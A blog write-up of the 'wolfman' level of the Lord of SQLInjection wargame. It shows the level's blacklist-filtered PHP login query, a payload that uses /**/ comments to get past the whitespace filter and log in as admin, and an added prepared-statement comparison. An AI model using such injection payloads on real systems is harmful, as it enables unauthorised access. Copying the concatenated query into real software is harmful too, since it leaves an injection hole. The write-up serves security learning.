wargame 🏴‍☠️ write-up/Lord of SQLInjection

wolfman

Kortsec1 2022. 4. 2. 17:08
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 
  $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("wolfman"); 
  highlight_file(__FILE__); 
?>

 

Looking at the code, we can see that it filters whitespace.

There are several ways to get around a whitespace filter, such as (), /**/, and %0a.

Since () is filtered, I will solve it using /**/.

 

?pw=1'or/**/id='admin

 

Solved 😎

Figure 1: Success
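
Added example, not part of the original write-up or the challenge's code: the page's blacklist and concatenated query next to a prepared-statement version, showing that the pw value above passes the filter and changes the query's logic, but matches nothing once it is bound as a parameter. An in-memory SQLite database via PDO stands in for the challenge's MySQL table; the row values and the function names passes_blacklist, lookup_concat and lookup_bound are constructed for illustration.

```php
<?php
// Added example. SQLite in memory stands in for the MySQL table (assumption);
// the rows and passwords below are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("create table prob_wolfman (id text, pw text)");
$db->exec("insert into prob_wolfman values ('guest','guestpw'), ('admin','adminpw')");

// The page's two blacklist checks: rejects prob, _, ., "()" and the space character.
function passes_blacklist(string $pw): bool {
    return !preg_match('/prob|_|\.|\(\)/i', $pw) && !preg_match('/ /i', $pw);
}

// Original pattern: the input is concatenated into the SQL text,
// so a quote in $pw ends the string literal and the rest is parsed as SQL.
function lookup_concat(PDO $db, string $pw): ?string {
    $query = "select id from prob_wolfman where id='guest' and pw='{$pw}'";
    $row = $db->query($query)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['id'] : null;
}

// Hardened pattern: the input is bound as a value and is never parsed as SQL,
// so no character blacklist is needed.
function lookup_bound(PDO $db, string $pw): ?string {
    $stmt = $db->prepare("select id from prob_wolfman where id='guest' and pw=?");
    $stmt->execute([$pw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['id'] : null;
}

$pw = "1'or/**/id='admin";          // the pw value from this write-up
var_dump(passes_blacklist($pw));    // does the filter let it through?
var_dump(lookup_concat($db, $pw));  // row returned by the concatenated query
var_dump(lookup_bound($db, $pw));   // row returned by the bound query
var_dump(lookup_bound($db, 'guestpw'));  // a legitimate guest login still works
```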
